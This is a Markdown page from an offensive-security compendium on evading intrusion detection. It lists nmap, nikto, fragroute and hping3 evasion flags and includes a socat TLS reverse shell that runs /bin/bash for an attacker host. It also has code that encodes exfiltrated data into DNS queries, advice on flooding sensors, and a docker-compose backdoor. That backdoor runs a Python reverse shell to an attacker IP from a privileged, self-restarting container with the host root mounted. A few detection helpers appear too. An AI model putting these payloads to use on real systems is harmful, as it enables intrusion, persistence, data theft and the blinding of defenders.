killchain-compendium/post_exploitation/docs/ids_ips_evation.md

IDS & IPS Evasion

  • Evasion by manipulation of
    • Tool parameters (user agents, timing, scan types)
    • Protocol (another transport, trusted source ports, fragmentation, invalid packets)
    • Payload (encoding, encryption, rewriting of commands)
    • Route (source routing, proxies)
    • Or tactical DoS against the sensor or its logging

Enumeration

nmap

  • --script-args http.useragent="<user-agent>" sets the User-Agent that NSE http scripts send (the default one is a well-known IDS signature)
  • -sS half-open (SYN) scan: the handshake is never completed, so the target application logs nothing; the SYN packets are still visible to a network IDS

nikto

  • -useragent <user-agent> replaces the default Nikto User-Agent
  • -Tuning 1 2 3 ... restricts the test classes and thus the number of requests
  • Do NOT use -evasion <encoding-technique>: these encoding tricks are themselves signatured and increase detection

Protocol Manipulation

Relying on another protocol, e.g. UDP where only TCP is inspected

  • nc -ulvnp 4711 to listen for incoming UDP traffic
  • nc -u $TARGET_IP $TARGET_PORT to connect over UDP

Manipulation of the source port on LHOST

  • nmap -g 80 or nmap --source-port 53 sends the scan traffic from a source port that filters often trust (HTTP, DNS)

Session splicing by fragmentation and segmentation (works only if the sensor does not reassemble before matching)

  • nmap -f fragments into 8-byte pieces, -ff into 16-byte pieces, --mtu <size> sets a custom size (must be a multiple of 8)
  • Use Fragroute with ip_frag <size> in fragroute.conf, then run fragroute -f fragroute.conf $TARGET_IP
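What those flags do at the packet level, as an added example that is not part of the compendium: the payload is cut into IPv4 fragments whose offset field counts 8-byte units (which is why nmap only accepts multiples of 8), and the reassembly function shows what a target stack, or an IDS that reassembles before matching, has to do to see the original bytes again. It generalises from the TCP header nmap -f splits to any transport payload; addresses, the IP ID and the sample request are constructed.

```python
"""Session splicing at the IP layer, the way nmap -f / --mtu and fragroute
ip_frag do it: one transport segment is cut into IPv4 fragments whose
offset field counts 8-byte units, so only a sensor that reassembles
before matching sees the original bytes.  Added example, not from the
compendium; everything stays in memory, no packets are sent."""
import struct

IP_MF = 1 << 13          # "more fragments" bit in the flags/offset field


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum; over a header whose checksum
    field is already filled in, the result is 0 if the header is intact."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_fragments(payload: bytes, frag_size: int, src: str, dst: str,
                    proto: int = 6, ident: int = 0x1234) -> list:
    """Split payload into IPv4 datagrams of frag_size data bytes each.
    frag_size must be a multiple of 8 (nmap -f = 8, -ff = 16, --mtu n = n)
    because the 13-bit offset field is expressed in 8-byte units."""
    if frag_size <= 0 or frag_size % 8:
        raise ValueError("fragment size must be a positive multiple of 8")
    s = bytes(int(x) for x in src.split("."))
    d = bytes(int(x) for x in dst.split("."))
    frags = []
    for off in range(0, len(payload), frag_size):
        chunk = payload[off:off + frag_size]
        more = off + frag_size < len(payload)
        flags_off = (IP_MF if more else 0) | (off // 8)
        # version/IHL, TOS, total length, ID, flags+offset, TTL, proto, checksum, src, dst
        hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(chunk), ident,
                          flags_off, 64, proto, 0, s, d)
        hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]
        frags.append(hdr + chunk)
    return frags


def frag_info(pkt: bytes) -> tuple:
    """(byte offset, more-fragments flag) of one fragment."""
    flags_off = struct.unpack("!H", pkt[6:8])[0]
    return (flags_off & 0x1FFF) * 8, bool(flags_off & IP_MF)


def reassemble(frags: list) -> bytes:
    """What a target stack (or a reassembling IDS) does: place each piece
    at its offset, whatever order it arrived in, and only deliver once the
    MF=0 fragment has arrived and no byte is missing."""
    pieces, total_len = {}, None
    for pkt in frags:
        hdr, data = pkt[:20], pkt[20:]
        if ipv4_checksum(hdr) != 0:
            raise ValueError("bad IPv4 header checksum")
        off, more = frag_info(pkt)
        pieces[off] = data
        if not more:
            total_len = off + len(data)
    if total_len is None:
        raise ValueError("final fragment (MF=0) never arrived")
    out, covered = bytearray(total_len), 0
    for off, data in pieces.items():
        out[off:off + len(data)] = data
        covered += len(data)
    if covered != total_len:
        raise ValueError("gap in fragment stream, cannot reassemble")
    return bytes(out)


if __name__ == "__main__":
    # constructed sample: an 18-byte request split like nmap -f would (8-byte pieces)
    parts = build_fragments(b"GET / HTTP/1.0\r\n\r\n", 8, "10.0.0.1", "10.0.0.2")
    for p in parts:
        print(frag_info(p), p[20:])
    print(reassemble(list(reversed(parts))))
```

A signature such as "GET / HTTP" never appears in any single fragment, which is the whole point; a sensor that keeps per-ID fragment state and matches after reassemble() is not fooled, and a sensor that does not is exactly what fragroute's ip_frag and nmap -f are probing for.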

Sending invalid packets

  • Invalid checksums and unusual header flags via nmap --badsum and nmap --scanflags URG/ACK/PSH/RST/SYN/FIN, e.g. concatenation of multiple flags nmap --scanflags SYNRSTFIN; a packet with a bad checksum is dropped by the target's stack, so any response or alert it triggers shows a sensor that does not verify checksums
  • hping3 with --ttl, --badsum and the header flags -S, -A, -P, -U, -F, -R

Payload Manipulation

Obfuscation and Encoding

  • Base64
  • URL
  • Escaped Unicode Characters

Encrypting Communication Channels

  • Use socat with TLS so the sensor sees only ciphertext; first create a self-signed certificate
openssl req -x509 -newkey rsa:2048 -days 365 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
  • Create the .pem (Privacy Enhanced Mail) file, key and certificate concatenated, via
cat id_rsa.key reverse.crt > reverse.pem
  • Listening on the attacker side (-d -d raises verbosity, verify=0 skips client certificate checks)
socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
  • On the target (verify=0 accepts the self-signed certificate; note that the certificate's subject and a self-signed issuer are themselves indicators a sensor can match on)
socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash

Modification of Data

  • Order of parameters: instead of nc -lvnp 4711 write nc -nvlp 4711 (getopt accepts any order; -p must keep its argument next to it)
  • Adding extra whitespace between the command and its arguments
  • Use aliases so the command word seen in the command line differs from the binary
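The three encodings listed under Obfuscation and Encoding and the three rewriting tricks listed under Modification of Data all defeat the same thing: a literal string signature. The following is an added example, not from the compendium, showing both sides: encode_variants() produces the Base64, URL and escaped-Unicode forms of a netcat listener command, and decode_layers() plus normalize_command() are the detection-side counterpart that peels the encodings and canonicalises flag order, whitespace and aliases before matching. The literal signature, the alias table and the set of value-taking options are constructed for the example.

```python
"""Payload manipulation and the detection-side counterpart.  Added example
(not from the compendium): encode_variants() produces the Base64 / URL /
escaped-Unicode forms that slip past a literal signature, decode_layers()
peels them again, and normalize_command() undoes the flag-order,
whitespace and alias tricks before the semantic match in
is_netcat_listener().  SIGNATURE, ALIASES and VALUE_OPTS are constructed."""
import base64
import os
import re
import shlex
import urllib.parse

SIGNATURE = "nc -lvnp"                      # naive literal IDS signature (constructed)
ALIASES = {"n": "nc", "listen": "nc -l"}    # constructed shell aliases on the host
VALUE_OPTS = {"p", "e", "w"}                # nc short options that take an argument (subset)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def encode_variants(payload: str) -> dict:
    """The same command in the three encodings a literal signature misses."""
    return {
        "plain": payload,
        "base64": base64.b64encode(payload.encode()).decode(),
        "url": urllib.parse.quote(payload, safe=""),
        "unicode": "".join("\\u%04x" % ord(c) for c in payload),
    }


def decode_layers(text: str, max_depth: int = 5) -> str:
    """Strip URL, Base64 and \\uXXXX layers (possibly stacked) until stable."""
    for _ in range(max_depth):
        before = text
        if "%" in text:
            text = urllib.parse.unquote(text)
        elif B64_RE.match(text) and len(text) % 4 == 0:
            try:
                text = base64.b64decode(text, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                pass
        elif "\\u" in text:
            text = text.encode("utf-8").decode("unicode_escape")
        if text == before:
            break
    return text


def normalize_command(cmd: str, aliases: dict = ALIASES) -> dict:
    """Canonical form: tool basename, sorted single-letter flags, option
    values and positional args, regardless of spacing, order or alias."""
    argv = shlex.split(cmd)                 # any amount of whitespace collapses here
    expanded = set()
    while argv and argv[0] in aliases and argv[0] not in expanded:
        expanded.add(argv[0])               # bash expands only the first word
        argv = shlex.split(aliases[argv[0]]) + argv[1:]
    if not argv:
        return {"tool": "", "flags": [], "opts": {}, "args": []}
    tool, flags, opts, args = os.path.basename(argv[0]), set(), {}, []
    i = 1
    while i < len(argv):
        a = argv[i]
        if len(a) > 1 and a[0] == "-" and a[1] != "-":
            letters = a[1:]
            flags.update(letters)           # -lvnp == -l -v -n -p == -nvlp
            if letters[-1] in VALUE_OPTS and i + 1 < len(argv):
                opts[letters[-1]] = argv[i + 1]
                i += 1
        else:
            args.append(a)
        i += 1
    return {"tool": tool, "flags": sorted(flags), "opts": opts, "args": args}


def is_netcat_listener(cmd: str) -> bool:
    """Semantic match: netcat in listen mode, however the line was written."""
    n = normalize_command(decode_layers(cmd))
    return n["tool"] in {"nc", "ncat", "netcat"} and "l" in n["flags"]


if __name__ == "__main__":
    for name, form in encode_variants("nc -lvnp 4711").items():
        print(f"{name:8} literal={SIGNATURE in form!s:5} semantic={is_netcat_listener(form)}")
    for line in ("nc -nvlp 4711", "nc   -l  -v -n  -p 4711", "n -nvlp 4711"):
        print(f"{line!r}: literal={SIGNATURE in line} semantic={is_netcat_listener(line)}")
```

The literal signature matches only the plain, unmodified form; the normalised matcher catches every variant, which is why rule authors prefer canonicalised fields (tool name, parsed flags) over raw command-line substrings.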

Route Manipulation

Relying on Source Routing

  • nmap --ip-options "L 10.10.20.30 10.10.30.40" routes through these IPs loosely (other hops may lie in between)
  • nmap --ip-options "S 10.10.20.30 10.10.30.40" routes through the IPs strictly (only the listed hops); most routers and hosts drop source-routed packets, so check the return path first
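The bytes behind the L and S shorthand, as an added example that is not from the compendium: the loose (type 0x83) and strict (type 0x89) source-route options of RFC 791, encoded from a hop list and parsed back. The hop addresses are the ones from the bullets above; the padding rule and the pointer handling follow the RFC, not any particular tool's output.

```python
"""IPv4 loose/strict source-route options (RFC 791) as selected by
nmap --ip-options "L ..." / "S ...".  Added example, not from the
compendium: builds the raw option bytes and parses them back; nothing
is sent on the network."""
import ipaddress
import struct

LSRR, SSRR = 0x83, 0x89   # loose / strict source and record route option types


def source_route_option(kind: str, hops: list) -> bytes:
    """kind 'L' (loose) or 'S' (strict); hops are the IPs the packet must
    traverse.  The result is padded with EOL (0x00) to a 4-byte multiple
    because the IP header length field counts 32-bit words."""
    opt_type = {"L": LSRR, "S": SSRR}[kind.upper()]
    if not hops or len(hops) > 9:
        raise ValueError("1..9 hops fit in the 40-byte option area")
    body = b"".join(ipaddress.IPv4Address(h).packed for h in hops)
    length = 3 + len(body)                       # type + length + pointer + addresses
    opt = struct.pack("!BBB", opt_type, length, 4) + body   # pointer 4 = first address
    return opt + b"\x00" * (-len(opt) % 4)


def parse_source_route(opt: bytes) -> dict:
    """Inverse: kind, the route list and the hop the pointer currently selects
    (None once the route is exhausted)."""
    opt_type, length, pointer = struct.unpack("!BBB", opt[:3])
    kind = {LSRR: "L", SSRR: "S"}[opt_type]
    addrs = [str(ipaddress.IPv4Address(opt[i:i + 4])) for i in range(3, length, 4)]
    next_hop = addrs[(pointer - 4) // 4] if pointer + 3 <= length else None
    return {"kind": kind, "hops": addrs, "next_hop": next_hop}


if __name__ == "__main__":
    opt = source_route_option("L", ["10.10.20.30", "10.10.30.40"])
    print(opt.hex(), parse_source_route(opt))
```

Each hop that honours the option advances the pointer by four and swaps itself into the destination field, which is also why a sensor that logs the option bytes sees the whole intended path.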

Using Proxy Servers

  • nmap --proxies http://$PROXY1:80,socks4://$PROXY2:8080 -sV $TARGET_IP; --proxies only relays the TCP connections nmap itself opens (NSE scripts, version detection), raw-packet scans such as -sS bypass the proxy entirely, so use a connect-style scan or proxychains for the port scan itself

Tactical DoS

  • Flood the sensor with non-malicious, benign traffic so that the real activity is dropped or buried in the noise; loud, and itself an indicator
    • IDS/IPS
    • Logging server

MISC

  • Changing
    • User-Agent
    • Request frequency and duration of sleep (jitter instead of a fixed beacon interval)
    • SSL/TLS certificates (default or self-signed certificate fields are well-known C2 indicators)
    • DNS beacon, storing exfiltrated data in the query name
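How the DNS beacon carries data in the query, as an added example that is not part of the compendium: the bytes are Base32-encoded (it survives case-folding resolvers), cut into labels within the RFC 1035 limits of 63 bytes per label and 253 per name, prefixed with a sequence number so the authoritative server can reassemble them in any order, and a defender-side length heuristic is included. The zone example.test, the session tag and the sample data are placeholders; nothing is sent.

```python
"""DNS beaconing with the exfiltrated data carried in the query name.
Added example, not from the compendium: packs bytes into hostname labels
under an attacker-controlled zone within the protocol limits (63 bytes
per label, 253 per name), decodes them from the observed query names,
and shows the length heuristic a defender can apply.  The zone
example.test and the session tag are placeholders; nothing is sent."""
import base64

LABEL_MAX, NAME_MAX = 63, 253


def _b32(data: bytes) -> str:
    """Base32 survives case-folding resolvers; '=' padding is dropped for space."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(data: bytes, zone: str, session: str = "s1",
                   labels_per_query: int = 3) -> list:
    """Names to resolve, one per chunk: <seq>.<label>...<label>.<session>.<zone>."""
    text = _b32(data)
    per_query = labels_per_query * LABEL_MAX
    names = []
    for seq, start in enumerate(range(0, len(text), per_query)):
        chunk = text[start:start + per_query]
        labels = [chunk[i:i + LABEL_MAX] for i in range(0, len(chunk), LABEL_MAX)]
        name = ".".join([str(seq), *labels, session, zone])
        if len(name) > NAME_MAX:
            raise ValueError(f"{len(name)}-byte name exceeds {NAME_MAX}; lower labels_per_query")
        names.append(name)
    return names


def decode_queries(names: list, zone: str) -> bytes:
    """Reassemble from the query names seen at the authoritative server, in
    any order; unrelated names under the zone are ignored."""
    suffix = "." + zone
    pieces = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 3 or not labels[0].isdigit():
            continue
        pieces[int(labels[0])] = "".join(labels[1:-1])   # drop seq and session labels
    return _unb32("".join(pieces[k] for k in sorted(pieces)))


def suspicious(name: str) -> bool:
    """Detection heuristic: ordinary hostnames rarely have labels anywhere
    near the 63-byte limit, encoded chunks routinely do.  Tune against your
    own baseline; some CDN and security products also use long labels."""
    return any(len(label) >= 40 for label in name.split("."))


if __name__ == "__main__":
    sample = (b"constructed exfil sample 0123456789 " * 6)[:200]   # constructed data
    queries = encode_queries(sample, "example.test")
    for q in queries:
        print(len(q), suspicious(q), q[:60] + "...")
    print(decode_queries(list(reversed(queries)), "example.test") == sample)
```

Splitting across many short queries instead of three full labels lowers the per-query length the heuristic keys on, at the price of more queries per second, which is the next thing a sensor baselines (request frequency above).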

Backdoors

  • Backdooring without being recognised by the IDS/IPS by reading its rule set from the config file on the compromised host and staying outside what the rules match

Docker

  • Create a docker-compose.yaml whose entrypoint is a reverse shell and mount the host's root filesystem to /mnt inside a privileged container; replace <Found image> with an image already present on the host (docker images) and <$ATTACKER_IP> with the listener's address. With / at /mnt and privileged: true, the shell has full read/write access to the host filesystem (e.g. chroot /mnt), and restart: always re-spawns the shell whenever it dies

```yaml
---
version: "2.1"
services:
  backdoorservice:
    restart: always
    image: <Found image>
    entrypoint: >
      python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
      s.connect(("<$ATTACKER_IP>",4711));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
      pty.spawn("/bin/sh")'
    volumes:
      - /:/mnt
    privileged: true
```